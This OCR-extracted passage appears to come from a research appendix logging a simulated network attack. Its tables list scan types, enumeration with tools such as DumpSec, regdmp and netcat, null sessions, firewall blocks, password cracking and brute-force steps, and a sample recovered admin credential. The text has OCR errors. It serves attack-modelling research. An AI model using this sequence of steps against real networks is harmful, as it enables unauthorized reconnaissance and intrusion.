Running  Applications 

Microsoft 

Remote 

Registry 

Service 

4 

ABE 

FP 

Connection  to  FTP  server  and 
examination  of  the  prompt  header 

[192.168.130.140] 
Running  Applications 

FTP 

4 

ABE 

FP 

Connection  to  FTP  server  and 
examination  of  the  prompt  header 

[192.168.130.140] 
Running  Applications 

Web- server 

4 

ABE 

FP 

Connection  to  FTP  server  and 
examination  of  the  prompt  header 

[192.168.130.140] 
Running  Applications 

Mail 

4 

ABE 

FP 

Connection  to  FTP  server  and 
examin  ation  of  the  prompt  header 

[192.168.130.1401 
Running  Applications 

Telnet 

4 

ABE 

FP 

Connection  to  FTP  server  and 
examination  of  the  prompt  header 

[192.168.130.140] 
Running  Applications 

Finger 

5 

ABE 

FP 

Connection  to  FTP  server  and 
examination  of  the  prompt  header 

[192.168.130.1411 
Running  Applications 

FTP 

5 

ABE 

FP 

Connection  to  FTP  server  and 
examin  ation  of  the  prompt  header 

[192.168.130.1411 
Running  Applications 

Telnet 

5 

ABE 

FP 

Connection  to  FTP  server  and 
examination  of  the  prompt  header 

[192.168.130.1411 
Running  Applications 

Mail- server 

5 

ABE 

FP 

Connection  to  FTP  server  and 
examination  of  the  prompt  header 

[192.168.130.1411 
Running  Applications 

WWW 

5 

ABE 

FP 

Connection  to  FTP  server  and 
examination  of  the  prompt  header 

[192.168.130.141] 
Running  Applications 

Finger 

10 

RCE 

UDUM 

Use  of  Dum  pSec 

[192.168.130.0] 

Running  Applications 

Forbidden  Attack 
<UDUM>;  Blocked 
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by  Firewall 
<ABE_Firewall> 


11 

RCE 

UDUM 

Use  of  DumpSec 

[192.168.130.1351 
Running  Applications 

MS  IIS 

11 

RCE 

UDUM 

Use  of  DumpSec 

[192.168.130.135] 
Running  Applications 

Active 

directory 

11 

RCE 

UDUM 

Use  of  DumpSec 

[192.168.130.135] 
Running  Applications 

Kerberos 

12 

RCE 

UDUM 

Use  of  DumpSec 

[192.168.130.138] 
Running  Applications 

13 

RCE 

UDUM 

Use  of  DumpSec 

[192.168.130.139] 
Running  Applications 

FTP -server 

14 

RCE 

UDUM 

Use  of  DumpSec 

[192.168.130.140] 
Running  Applications 

15 

RCE 

UDUM 

Use  of  DumpSec 

[192.168.130.1411 
Running  Applications 

18 

RCE 

UDUM 

Use  of  DumpSec 

[192.168.130.135] 
Running  Applications 

DNS 

19 

RCE 

UDUM 

Use  of  DumpSec 

[192.168.130.138] 
Running  Applications 

Microsoft 

Outlook 

19 

RCE 

UDUM 

Use  of  DumpSec 

[192.168.130.138] 
Running  Applications 

MS  Personal 
Web  Server 

20 

RCE 

UDUM 

Use  of  DumpSec 

[192.168.130.139] 
Running  Applications 

FTP -server 

20 

RCE 

UDUM 

Use  of  DumpSec 

[192.168.130.139] 
Running  Applications 

Microsoft 

Remote 

Registry 

Service 

21 

RCE 

UDUM 

Use  of  DumpSec 

[192.168.130.140] 
Running  Applications 

22 

RCE 

UDUM 

Use  of  DumpSec 

[192.168.130.141] 
Running  Applications 

26 

RCE 

UDUM 

Use  of  DumpSec 

[192.168.130.0] 

Running  Applications 

Forbidden  Attack 
<UDUM>;  Blocked 
by  Firewall 
<ABE_Firewall> 

27 

RCE 

UDUM 

Use  of  DumpSec 

[192.168.130.0] 

Running  Applications 

Forbidden  Attack 
<UDUM>;  Blocked 
by  Firewall 
<ABE_Firewall> 

30 

RCE 

UREG 

Use  of  regdmp 

[192.168.130.0] 

Running  Applications 

Forbidden  Attack 
<UREG>;  Blocked 
by  Firewall 
<ABE_Firewall> 

31 

RCE 

UREG 

Use  of  regdmp 

[192.168.130.0] 

Running  Applications 

Forbidden  Attack 
<UREG>;  Blocked 
by  Firewall 
<ABE_Firewall> 

32 

RCE 

UREG 

Use  of  regdmp 

[192.168.130.0] 

Running  Applications 

Forbidden  Attack 
<UREG>;  Blocked 
by  Firewall 
<ABE_Firewall> 

36 

ABE 

FP 

Connection  to  FTP  server  and 
examin  ation  of  the  prompt  header 

[192.168.130.135] 
Running  Applications 

37 

ABE 

FP 

Connection  to  FTP  server  and 
examin  ation  of  the  prompt  header 

[192.168.130.138] 
Running  Applications 

38 

ABE 

FP 

Connection  to  FTP  server  and 
examin  ation  of  the  prompt  header 

[192.168.130.139] 
Running  Applications 

Microsoft 

Remote 

Registry 

Service 

38 

ABE 

FP 

Connection  to  FTP  server  and 
examin  ation  of  the  prompt  header 

[192.168.130.1391 
Running  Applications 

FTP -server 

38 

ABE 

FP 

Connection  to  FTP  server  and 
examin  ation  of  the  prompt  header 

[192.168.130.139] 
Running  Applications 

MS  IIS 

38 

ABE 

FP 

Connection  to  FTP  server  and 
examin  ation  of  the  prompt  header 

[192.168.130.1391 
Running  Applications 

Mail- server 

39 

ABE 

FP 

Connection  to  FTP  server  and 
examination  of  the  prompt  header 

[192.168.130.140] 
Running  Applications 

Web- server 

39 

ABE 

FP 

Connection  to  FTP  server  and 
examin  ation  of  the  prompt  header 

[192.168.130.140] 
Running  Applications 

FTP 

39 

ABE 

FP 

Connection  to  FTP  server  and 
examin  ation  of  the  prompt  header 

[192.168.130.140] 
Running  Applications 

Telnet 
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39 

ABE 

FP 

Connection  to  FTP  server  and 
examin  ation  of  the  prompt  header 

[192.168.130.140] 
Running  Applications 

Mail 

39 

ABE 

FP 

Connection  to  FTP  server  and 
examin  ation  of  the  prompt  header 

[192.168.130.140] 
Running  Applications 

Finger 

40 

ABE 

FP 

Connection  to  FTP  server  and 
examin  ation  of  the  prompt  header 

[192.168.130.141] 
Running  Applications 

Telnet 

40 

ABE 

FP 

Connection  to  FTP  server  and 
examin  ation  of  the  prompt  header 

[192.168.130.141] 
Running  Applications 

Mail- server 

40 

ABE 

FP 

Connection  to  FTP  server  and 
examin  ation  of  the  prompt  header 

[192.168.130.141] 
Running  Applications 

WWW 

41 

ABE 

FP 

Connection  to  FTP  server  and 
examin  ation  of  the  prompt  header 

[192.168.130.135] 
Running  Applications 

42 

ABE 

FP 

Connection  to  FTP  server  and 
examin  ation  of  the  prompt  header 

[192.168.130.138] 
Running  Applications 

43 

ABE 

FP 

Connection  to  FTP  server  and 
examin  ation  of  the  prompt  header 

[192.168.130.139] 
Running  Applications 

MS  IIS 

43 

ABE 

FP 

Connection  to  FTP  server  and 
examin  ation  of  the  prompt  header 

[192.168.130.139] 
Running  Applications 

FTP -server 

43 

ABE 

FP 

Connection  to  FTP  server  and 
examin  ation  of  the  prompt  header 

[192.168.130.139] 
Running  Applications 

Mail- server 

43 

ABE 

FP 

Connection  to  FTP  server  and 
examin  ation  of  the  prompt  header 

[192.168.130.139] 
Running  Applications 

Microsoft 

Remote 

Registry 

Service 

44 

ABE 

FP 

Connection  to  FTP  server  and 
examin  ation  of  the  prompt  header 

[192.168.130.140] 
Running  Applications 

Web- server 

44 

ABE 

FP 

Connection  to  FTP  server  and 
examin  ation  of  the  prompt  header 

[192.168.130.140] 
Running  Applications 

Finger 

44 

ABE 

FP 

Connection  to  FTP  server  and 
examin  ation  of  the  prompt  header 

[192.168.130.140] 
Running  Applications 

Mail 

44 

ABE 

FP 

Connection  to  FTP  server  and 
examination  of  the  prompt  header 

[192.168.130.140] 
Running  Applications 

Telnet 

45 

ABE 

FP 

Connection  to  FTP  server  and 
examin  ation  of  the  prompt  header 

[192.168.130.141] 
Running  Applications 

FTP 

45 

ABE 

FP 

Connection  to  FTP  server  and 
examin  ation  of  the  prompt  header 

[192.168.130.141] 
Running  Applications 

Telnet 

45 

ABE 

FP 

Connection  to  FTP  server  and 
examin  ation  of  the  prompt  header 

[192.168.130.141] 
Running  Applications 

Mail- server 

45 

ABE 

FP 

Connection  to  FTP  server  and 
examin  ation  of  the  prompt  header 

[192.168.130.1411 
Running  Applications 

WWW 

45 

ABE 

FP 

Connection  to  FTP  server  and 
examin  ation  of  the  prompt  header 

[192.168.130.1411 
Running  Applications 

Finger 

50 

RCE 

UREG 

Use  of  regdmp 

[192.168.130.1351 
Running  Applications 

DNS 

51 

RCE 

UREG 

Use  of  regdmp 

[192.168.130.138] 
Running  Applications 

52 

RCE 

UREG 

Use  of  regdmp 

[192.168.130.139] 
Running  Applications 

FTP -server 

52 

RCE 

UREG 

Use  of  regdmp 

[192.168.130.139] 
Running  Applications 

Microsoft 

Remote 

Registry 

Service 

53 

RCE 

UREG 

Use  of  regdmp 

[192.168.130.140] 
Running  Applications 

54 

RCE 

UREG 

Use  of  regdmp 

[192.168.130.1411 
Running  Applications 

61 

RCE 

UREG 

Use  of  regdmp 

[192.168.130.0] 

Running  Applications 

Forbidden  Attack 
<UREG>;  Blocked 
by  Firewall 
<ABE_Firewall> 

62 

RCE 

UREG 

Use  of  regdmp 

[192.168.130.0] 

Running  Applications 

Forbidden  Attack 
<UREG>;  Blocked 
by  Firewall 
<ABE_Firewall> 

65 

RCE 

UREG 

Use  of  regdmp 

[192.168.130.0] 

Running  Applications 

Forbidden  Attack 
<UREG>;  Blocked 
by  Firewall 
<ABE_Firewall> 

69 

ABE 

UNU 

Use  of  netcat  utility  for  Applications 
Enumeration 

[192.168.130.0] 

Running  Applications 

Forbidden  Attack 
<UNU>;  Blocked  by 
Firewall 

<ABE_Firewall> 
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70 

ABE 

UNU 

Use  of  netcat  utility  for  Applications 
Enumeration 

[192.168.130.0] 

Running  Applications 

Forbidden  Attack 
<UNU>;  Blocked  by 
Firewall 

<ABE_Firewall> 

71 

ABE 

UNU 

Use  of  netcat  utility  for  Applications 
Enumeration 

[192.168.130.0] 

Running  Applications 

Forbidden  Attack 
<UNU>;  Blocked  by 
Firewall 

<ABE_Firewall> 

72 

ABE 

UNU 

Use  of  netcat  utility  for  Applications 
Enumeration 

[192.168.130.0] 

Running  Applications 

Forbidden  Attack 
<UNU>;  Blocked  by 
Firewall 

<ABE_Firewall> 

74 

END 

ATTACK  IS  OVER  !!! 

A4.1 2.  Total  log  of  the  intention  GAR  (“Gaining  Access  to  Resources”)  realization 

Conditions  for  the  realization  of  malefactor’s  intention  GAR: 

•  protection  degree  of  network  firewall  is  “None”  (2); 

•  protection  degree  of  attacked  host  firewall  is  “None”  (2) ; 

•  protection  parameters  of  attacked  host  are  “Weak”  (2) ; 

•  degree  of  hacker’s  knowledge  about  a  network  is  “Nothing”  (2). 

Total  log  of  the  intention  GAR  realization  is  as  follows: 


msa 

A 

S 

Description 

ResultComment 

Result 

FailResult 

6 

SPIS 

HS 

Half  scan 

Active  Ports 

23 

6 

SPIS 

HS 

Half  scan 

Active  Ports 

137 

6 

SPIS 

HS 

Half  scan 

Active  Ports 

138 

6 

SPIS 

HS 

Half  scan 

Active  Ports 

80 

6 

SPIS 

HS 

Half  scan 

Active  Ports 

21 

9 

SPIS 

DHS 

Dumb  host  scan 

Active  Ports 

80 

9 

SPIS 

DHS 

Dumb  host  scan 

Active  Ports 

21 

9 

SPIS 

DHS 

Dumb  host  scan 

Active  Ports 

23 

9 

SPIS 

DHS 

Dumb  host  scan 

Active  Ports 

8080 

9 

SPIS 

DHS 

Dumb  host  scan 

Active  Ports 

137 

9 

SPIS 

DHS 

Dumb  host  scan 

Active  Ports 

138 

10 

SPIS 

DHS 

Dumb  host  scan 

Active  Ports 

8080 

10 

SPIS 

DHS 

Dumb  host  scan 

Active  Ports 

21 

10 

SPIS 

DHS 

Dumb  host  scan 

Active  Ports 

80 

10 

SPIS 

DHS 

Dumb  host  scan 

Active  Ports 

138 

10 

SPIS 

DHS 

Dumb  host  scan 

Active  Ports 

137 

10 

SPIS 

DHS 

Dumb  host  scan 

Active  Ports 

23 

14 

SPIS 

SFB 

Scanning  FTP  Bounce 

Active  Ports 

138 

14 

SPIS 

SFB 

Scanning  FTP  Bounce 

Active  Ports 

80 

14 

SPIS 

SFB 

Scanning  FTP  Bounce 

Active  Ports 

21 

14 

SPIS 

SFB 

Scanning  FTP  Bounce 

Active  Ports 

8080 

14 

SPIS 

SFB 

Scanning  FTP  Bounce 

Active  Ports 

137 

15 

SPIS 

SFB 

Scanning  FTP  Bounce 

Active  Ports 

8080 

15 

SPIS 

SFB 

Scanning  FTP  Bounce 

Active  Ports 

80 

15 

SPIS 

SFB 

Scanning  FTP  Bounce 

Active  Ports 

23 

15 

SPIS 

SFB 

Scanning  FTP  Bounce 

Active  Ports 

138 

15 

SPIS 

SFB 

Scanning  FTP  Bounce 

Active  Ports 

137 

15 

SPIS 

SFB 

Scanning  FTP  Bounce 

Active  Ports 

21 

18 

SPIS 

DHS 

Dumb  host  scan 

Active  Ports 

8080 

18 

SPIS 

DHS 

Dumb  host  scan 

Active  Ports 

138 

18 

SPIS 

DHS 

Dumb  host  scan 

Active  Ports 

23 

18 

SPIS 

DHS 

Dumb  host  scan 

Active  Ports 

21 

18 

SPIS 

DHS 

Dumb  host  scan 

Active  Ports 

80 

18 

SPIS 

DHS 

Dumb  host  scan 

Active  Ports 

137 

22 

SPIS 

SX 

TCP  Xmas  Tree  scan 

Active  Ports 

23 

22 

SPIS 

SX 

TCP  Xmas  Tree  scan 

Active  Ports 

8080 

26 

IO 

MD 

Monitoring  of  the  fragmentation 
prohibition  bit  DF 

Operating  System 

27 

IO 

MD 

Monitoring  of  the  fragmentation 
prohibition  bit  DF 

Operating  System 

Windows  2000  SP3 

30 

IO 

IDOS 

Examination  of  response  for  DoS 
attacks 

Operating  System 
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31 

IO 

IDOS 

Examination  of  response  for  DoS 
attacks 

Operating  System 

32 

IO 

IDOS 

Examinatio  n  of  response  for  DoS 
attacks 

Operating  System 

33 

IO 

IDOS 

Examination  of  response  for  DoS 
attacks 

Operating  System 

Windows  SP3 

37 

Cl 

NS 

Collection  of  additional 
information  from  DNS- server 

Host  Names 

41 

RE 

CNS 

Connection  -  null  sessions 

Null  Session 

Connection  was  done 
successfully 

44 

ENS 

LEG 

Enumerating  NetBIOS  Shares  with 
Legion 

Shared  Resources 

\\spiiran-erv\C 

44 

ENS 

LEG 

Enumerating  NetBIOS  Shares  with 
Legion 

Shared  Resources 

\\spiiran-erv\D 

48 

RE 

CNS 

Connection  -  null  sessions 

Null  Session 

Connection  was  done 
successfully 

49 

RE 

ERD 

Enumerating  NT/2000  Related 
Domains 

Related  Domains 

lan2.net 

53 

UE 

CNS 

Connection  -  null  sessions 

_ 

54 

UE 

EUE 

Enumerating  Users  with  enum 

Users  ID  and  Psw 

Admin 

54 

UE 

EUE 

Enumerating  Users  with  enum 

Users  ID  and  Psw 

RtYrw_!@ 

58 

ABE 

FP 

Connection  to  FTP  server  and 
examin  ation  of  the  prompt  header 

Running  Applications 

FTP -server 

58 

ABE 

FP 

Connection  to  FTP  server  and 
examin  ation  of  the  prompt  header 

Running  Applications 

SNMP -agent 

58 

ABE 

FP 

Connection  to  FTP  server  and 
examin  ation  of  the  prompt  header 

Running  Applications 

WINS-Server 

58 

ABE 

FP 

Connection  to  FTP  server  and 
examin  ation  of  the  prompt  header 

Running  Applications 

Mail- server 

58 

ABE 

FP 

Connection  to  FTP  server  and 
examin  ation  of  the  prompt  header 

Running  Applications 

PWS 

58 

ABE 

FP 

Connection  to  FTP  server  and 
examin  ation  of  the  prompt  header 

Running  Applications 

DNS-server 

58 

ABE 

FP 

Connection  to  FTP  server  and 
examin  ation  of  the  prompt  header 

Running  Applicat  ions 

MS  IIS 

58 

ABE 

FP 

Connection  to  FTP  server  and 
examin  ation  of  the  prompt  header 

Running  Applications 

MS  Remote  Registry 
Service 

58 

ABE 

FP 

Connection  to  FTP  server  and 
examin  ation  of  the  prompt  header 

Running  Applications 

MS  SQL  Server  2000 

66 

SPIH 

STIH 

TCP  connect  scan 

P-addresses 

67 

SPIH 

STIH 

TCP  connect  scan 

P-addresses 

71 

IH 

DC 

Network  Ping  Sweeps 

P-addresses 

75 

IO 

IDOS 

Examination  of  response  for  DoS 
attacks 

Operating  System 

79 

Cl 

NS 

Collection  of  additional 

information  from  DNS- server 

Host  Names 

80 

Cl 

NS 

Collection  of  additional 
information  from  DNS- server 

Host  Names 

84 

RE 

EDNV 

Enumerating  NT/2000  Domains 
with  net  view 

Domain  Name 

lan3.net 

85 

RE 

EDNV 

Enumerating  NT/2000  Domains 
with  net  view 

Domain  Name 

lan3.net 

86 

RE 

EDC 

Enumerating  NT/2000  Domain 
Controllers  with  nltestl 

Domain  controllers 

spiiran  -erv.lan3.net 

87 

RE 

EDC 

Enumerating  NT/2000  Domain 
Controllers  with  nltestl 

Domain  controllers 

spiiran  -erv.lan3.net 

88 

RE 

CNS 

Connection  -  null  sessions 

Null  Session 

Connection  was  done 
successfully 

91 

ENS 

DUMP 

Enumerating  NetBIOS  Shares  with 
DumpSec 

Shared  Resources 

\\spiiran-erv\C 

91 

ENS 

DUMP 

Enumerating  NetBIOS  Shares  with 
DumpSec 

Shared  Resources 

\\spiiran-erv\D 

92 

ENS 

DUMP 

Enumerating  Net  BIOS  Shares  with 
DumpSec 

Shared  Resources 

\\spiiran-erv\C 

92 

ENS 

DUMP 

Enumerating  NetBIOS  Shares  with 
DumpSec 

Shared  Resources 

\\spiiran-erv\D 

93 

ENS 

DUMP 

Enumerating  NetBIOS  Shares  with 
DumpSec 

Shared  Resources 

\\spiiran-erv\D 

97 

RE 

CNS 

Connection  -  null  sessions 
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98 

RE 

ERD 

Enumerating  NT/2000  Related 
Domains 

Related  Domains 

lan2.net 

101 

RE 

EDNV 

Enumerating  NT/2000  Domains 
with  net  view 

Domain  Name 

lan3.net 

102 

RE 

EDC 

Enumerating  NT/2000  Domain 
Controllers  with  nltestl 

Domain  controllers 

spiiran  -erv.lan3.net 

103 

RE 

EDC 

Enumerating  NT/2000  Domain 
Controllers  with  nltestl 

Domain  controllers 

spiiran  -erv.lan3.net 

104 

RE 

EDNV 

Enumerating  NT/2000  Domains 
with  net  view 

Domain  Name 

lan3.net 

105 

RE 

EDC 

Enumerating  NT/2000  Domain 
Controllers  with  nltestl 

Domain  controllers 

spiiran  -erv.lan3.net 

109 

UE 

CNS 

Connection  -  null  sessions 

Null  Session 

Connection  was  done 
successfully 

110 

UE 

DNNT 

Dumping  the  NetBIOS  Name  Table 
with  nbtstat  and  nbtscan 

Users  ID  and  Psw 

113 

UE 

SNMPE 

SNMP  Enumeration  with  snmputil 
or  IP  Network  Browser 

Users  ID  and  Psw 

119 

RCE 

UREG 

Use  of  regdmp 

Running  Applications 

Mail- server 

119 

RCE 

UREG 

Use  of  regdmp 

Running  Applications 

MS  Remote  Registry 
Service 

120 

RCE 

UREG 

Use  of  regdmp 

Running  Applicat  ions 

SNMP -agent 

120 

RCE 

UREG 

Use  of  regdmp 

Running  Applications 

FTP -server 

120 

RCE 

UREG 

Use  of  regdmp 

Running  Applications 

MS  SQL  Server  2000 

123 

RCE 

UREG 

Use  of  regdmp 

Running  Applications 

Mail- server 

123 

RCE 

UREG 

Use  of  regdmp 

Running  Applications 

WINS-Server 

130 

IH 

DC 

Network  Ping  Sweeps 

P-addresses 

135 

SPIS 

SH 

TCP  FIN  scan 

Active  Ports 

139 

SPIS 

SS 

TCP  SYN  scan 

Active  Ports 

138 

139 

SPIS 

SS 

TCP  SYN  scan 

Active  Ports 

137 

139 

SPIS 

SS 

TCP  SYN  scan 

Active  Ports 

21 

139 

SPIS 

SS 

TCP  SYN  scan 

Active  Ports 

23 

139 

SPIS 

SS 

TCP  SYN  scan 

Active  Ports 

8080 

140 

SPIS 

SS 

TCP  SYN  scan 

Active  Ports 

23 

140 

SPIS 

SS 

TCP  SYN  scan 

Active  Ports 

138 

140 

SPIS 

SS 

TCP  SYN  scan 

Active  Ports 

8080 

140 

SPIS 

SS 

TCP  SYN  scan 

Active  Ports 

137 

144 

IO 

IDOS 

Examination  of  response  for  DoS 
attacks 

Operating  System 

148 

Cl 

NS 

Collection  of  additional 
information  from  DNS- server 

Host  Names 

149 

Cl 

NS 

Collection  of  additional 
information  from  DNS- server 

Host  Names 

150 

Cl 

NS 

Collection  of  additional 
information  from  DNS- server 

Host  Names 

151 

Cl 

NS 

Collection  of  additional 
information  from  DNS- server 

Host  Names 

155 

RE 

EDC 

Enumerating  NT/2000  Domain 
Controllers  with  nltestl 

Domain  controllers 

~ 

spiiran  -erv.lan3.net 

156 

RE 

CNS 

Connection  -  null  sessions 

157 

RE 

ERD 

Enumerating  NT/2000  Related 
Domains 

Related  Domains 

lan2.net 

161 

UE 

SNMPE 

SNMP  Enumeration  with  snmputil 
or  IP  Network  Browser 

Users  ID  and  Psw 

165 

ABE 

FP 

Connection  to  FTP  server  and 
examin  ation  of  the  prompt  header 

Running  Applications 

FTP -server 

165 

ABE 

FP 

Connection  to  FTP  server  and 
examin  ation  of  the  prompt  header 

Running  Applications 

DNS-server 

165 

ABE 

FP 

Connection  to  FTP  server  and 
examin  ation  of  the  prompt  header 

Running  Applications 

MS  IIS 

165 

ABE 

FP 

Connection  to  FTP  server  and 
examin  ation  of  the  prompt  header 

Running  Applications 

SNMP -agent 

165 

ABE 

FP 

Connection  to  FTP  server  and 
examin  ation  of  the  prompt  header 

Running  Applications 

MS  SQL  Server  2000 

165 

ABE 

FP 

Connection  to  FTP  server  and 
examin  ation  of  the  prompt  header 

Running  Applications 

PWS 

165 

ABE 

FP 

Connection  to  FTP  server  and 
examin  ation  of  the  prompt  header 

Running  Applications 

WINS-Server 

165 

ABE 

FP 

Connection  to  FTP  server  and 
examin  ation  of  the  prompt  header 

Running  Applications 

MS  Remote  Registry 
Service 

171 

IO 

IDOS 

Examination  of  response  for  DoS 

[  Operating  System 

Windows  2000  SP3 

195 


attacks 

175 

Cl 

NS 

Collection  of  additional 
information  from  DNS- server 

Host  Names 

178 

Cl 

1ST 

Inquiry  of  system  time 

System  Time 

179 

Cl 

1ST 

Inquiry  of  system  time 

System  Time 

183 

RE 

EDC 

Enumerating  NT/2000  Domain 
Controllers  with  nltestl 

Domain  controllers 

184 

RE 

EDNV 

Enumerating  NT/2000  Domains 
with  net  view 

Domain  Name 

lan3.net 

185 

RE 

CNS 

Connection  -  null  sessions 

Null  Session 

Connection  was  done 
successfully 

186 

RE 

ERD 

Enumerating  NT/2000  Related 
Domains 

Related  Domains 

lan2.net 

190 

UE 

CNS 

Connection  -  null  sessions 

Z 

191 

UE 

EUE 

Enumerating  Users  with  enuni 

Users  ID  and  Psw 

Admin 

191 

UE 

EUE 

Enumerating  Users  with  enuni 

Users  ID  and  Psw 

RtYrw_!@ 

195 

ABE 

TCBG 

Telnet  Connection  Banner 

Grabbing 

Running  Applications 

WINS-Server 

195 

ABE 

TCBG 

Telnet  Connection  Banner 

Grabbing 

Running  Applications 

SNMP -agent 

195 

ABE 

TCBG 

Telnet  Connection  Banner 

Grabbing 

Running  Applications 

MS  Remote  Registry 
Service 

195 

ABE 

TCBG 

Telnet  Connection  Banner 

Grabbing 

Running  Applications 

MS  IIS 

195 

ABE 

TCBG 

Telnet  Connection  Banner 

Grabbing 

Running  Applications 

FTP -server 

195 

ABE 

TCBG 

Telnet  Connection  Banner 

Grabbing 

Running  Applications 

DNS-server 

195 

ABE 

TCBG 

Telnet  Connection  Banner 

Grabbing 

Running  Applications 

PWS 

200 

RCE 

UDUM 

Use  of  DumpSec 

Running  Applications 

MS  Remote  Registry 
Service 

200 

RCE 

UDUM 

Use  of  DumpSec 

Running  Applications 

MS  IIS 

200 

RCE 

UDUM 

Use  of  DumpSec 

Running  Applications 

MS  SQL  Server  2000 

200 

RCE 

UDUM 

Use  of  DumpSec 

Running  Applications 

DNS-server 

200 

RCE 

UDUM 

Use  of  DumpSec 

Running  Applications 

SNMP -agent 

203 

RCE 

UREG 

Use  of  regdnip 

Running  Applications 

DNS-server 

203 

RCE 

UREG 

Use  of  regdnip 

Running  Applications 

SNMP -agent 

203 

RCE 

UREG 

Use  of  regdnip 

Running  Applications 

PWS 

203 

RCE 

UREG 

Use  of  regdnip 

Running  Applications 

MS  SQL  Server  2000 

212 

EKV 

UPWS 

Usage  of  initial  versions  of  MS 

PWS  for  gaining  files  contents  and 
access  to  a  host 

217 

GAR 

CPF 

Cracking  of  PWL  File  and  access 
to  a  host 

224 

SPIH 

SSIH 

TCP  SYN  scan 

P-addresses 

227 

SPIH 

STIH 

TCP  connect  scan 

P-addresses 

233 

SPIS 

SFB 

Scanning  FTP  Bounce 

Active  Ports 

80 

233 

SPIS 

SFB 

Scanning  FTP  Bounce 

Active  Ports 

21 

233 

SPIS 

SFB 

Scanning  FTP  Bounce 

Active  Ports 

23 

233 

SPIS 

SFB 

Scanning  FTP  Bounce 

Active  Ports 

8080 

233 

SPIS 

SFB 

Scanning  FTP  Bounce 

Active  Ports 

137 

233 

SPIS 

SFB 

Scanning  FTP  Bounce 

Active  Ports 

138 

237 

IO 

IDOS 

Examination  of  response  for  DoS 
attacks 

Operating  System 

Windows  2000 

238 

IO 

IDOS 

Examination  of  response  for  DoS 
attacks 

Operating  System 

Windows  2000 

241 

IO 

IDOS 

Examination  of  response  for  DoS 
attacks 

Operating  System 

242 

IO 

IDOS 

Examination  of  response  for  DoS 
attacks 

Operating  System 

Windows  2000 

246 

Cl 

NS 

Collection  of  additional 
information  from  DNS- server 

Host  Names 

249 

Cl 

1ST 

Inquiry  of  system  time 

System  Time 

253 

RE 

EDNV 

Enumerating  NT/2000  Domains 
with  net  view 

Domain  Name 

lan3.net 

254 

RE 

EDNV 

Enumerating  NT/2000  Domains 
with  net  view 

Domain  Name 

255 

RE 

CNS 

Connection  -  null  sessions 

Null  Session 

Connection  was  done 
successfully 
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258 

ENS 

NETV 

Enumerating  NetBIOS  Shares  with 
Netviewx 

Shared  Resources 

\\spiiran-erv\C 

258 

ENS 

NETV 

Enumerating  NetBIOS  Shares  with 
Netviewx 

Shared  Resources 

\\spiiran-erv\D 

259 

ENS 

NETV 

Enumerating  NetBIOS  Shares  with 
Netviewx 

Shared  Resources 

\\spiiran-erv\C 

260 

ENS 

NETV 

Enumerating  NetBIOS  Shares  with 
Netviewx 

Shared  Resources 

\\spiiran-erv\C 

261 

ENS 

NETV 

Enumerating  NetBIOS  Shares  with 
Netviewx 

Shared  Resources 

\\spiiran-erv\C 

261 

ENS 

NETV 

Enumerating  NetBIOS  Shares  with 
Netviewx 

Shared  Resources 

\\spiiran-erv\D 

262 

ENS 

NETV 

Enumerating  NetBIOS  Shares  with 
Netviewx 

Shared  Resources 

\\spiiran-erv\D 

262 

ENS 

NETV 

Enumerating  NetBIOS  Shares  with 
Netviewx 

Shared  Resources 

\\spiiran-erv\C 

267 

UE 

SNMPE 

SNMP  Enumeration  with  snmputil 
or  IP  Network  Browser 

Users  ID  and  Psw 

Admin 

271 

ABE 

UNU 

Use  of  netcat  utility  for 

Applications  Enumeration 

Running  Applications 

Mail- server 

271 

ABE 

UNU 

Use  of  netcat  utility  for 

Applications  Enumeration 

Running  Applications 

MS  Remote  Registry 
Service 

271 

ABE 

UNU 

Use  of  netcat  utility  for 

Applications  Enumeration 

Running  Applications 

MS  SQL  Server  2000 

271 

ABE 

UNU 

Use  of  netcat  utility  for 

Applications  Enumeration 

Running  Applications 

PWS 

271 

ABE 

UNU 

Use  of  netcat  utility  for 

Applications  Enumeration 

Running  Applications 

SNMP -agent 

271 

ABE 

UNU 

Use  of  netcat  utility  for 

Applications  Enumeration 

Running  Applications 

WINS-Server 

272 

ABE 

UNU 

Use  of  netcat  utility  for 

Applications  Enumeration 

Running  Applications 

PWS 

272 

ABE 

UNU 

Use  of  netcat  utility  for 

Applications  Enumeration 

Running  Applications 

DNS-server 

272 

ABE 

UNU 

Use  of  netcat  utility  for 

Applications  Enumeration 

Running  Applications 

Mail- server 

272 

ABE 

UNU 

Use  of  netcat  utility  for 

Applications  Enumeration 

Running  Applications 

FTP-  server 

272 

ABE 

UNU 

Use  of  netcat  utility  for 

Applications  Enumeration 

Running  Applications 

MS  Remote  Registry 
Service 

272 

ABE 

UNU 

Use  of  netcat  utility  for 

Applications  Enumeration 

Running  Applications 

WINS-Server 

272 

ABE 

UNU 

Use  of  netcat  utility  for 

Applications  Enumeration 

Running  Applications 

MS  SQL  Server  2000 

278 

GAR 

BFPG 

Brute  Force  Password  Guessing 
and  access  to  a  host 

286 

UFPS 

FCA 

Free  Common  Access  Realization 

291 

IO 

IDOS 

Examination  of  response  for  DoS 
attacks 

Operating  System 

Windows  2000  SP3 

292 

IO 

IDOS 

Examination  of  response  for  DoS 
attacks 

Operating  System 

Windows 

295 

IO 

IDOS 

Examination  of  response  for  DoS 
attacks 

Operating  System 

299 

Cl 

AM 

Definition  of  the  network  adapter 
mask 

Network  Adapter  Mask 

255.255.255.224 

300 

Cl 

AM 

Definition  of  the  network  adapter 
mask 

Network  Adapter  Mask 

255.255.255.224 

304 

RE 

EDC 

Enumerating  NT/2000  Domain 
Controllers  with  nltestl 

Domain  controllers 

305 

RE 

CNS 

Connection  -  null  sessions 

306 

RE 

ERD 

Enumerating  NT/2000  Related 
Domains 

Related  Domains 

lan2.net 

310 

UE 

SNMPE 

SNMP  Enumeration  with  snmputil 
or  IP  Network  Browser 

Users  ID  and  Psw 

313 

UE 

SNMPE 

SNMP  Enumeration  with  snmputil 
or  IP  Network  Browser 

Users  ID  and  Psw 

314 

UE 

SNMPE 

SNMP  Enumeration  with  snmputil 
or  IP  Network  Browser 

Users  ID  and  Psw 

Admin 

318 

ABE 

TCBG 

Telnet  Connection  Banner 

Grabbing 

Running  Applications 

Mail- server 

318 

ABE 

TCBG 

Telnet  Connection  Banner 

Grabbing 

Running  Applications 

DNS-server 
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318 

ABE 

TCBG 

Telnet  Connection  Banner 

Grabbing 

Running  Applications 

FTP -server 

318 

ABE 

TCBG 

Telnet  Connection  Banner 

Grabbing 

Running  Applications 

MS  SQL  Server  2000 

318 

ABE 

TCBG 

Telnet  Connection  Banner 

Grabbing 

Running  Applications 

WINS-Server 

318 

ABE 

TCBG 

Telnet  Connection  Banner 

Grabbing 

Running  Applications 

PWS 

318 

ABE 

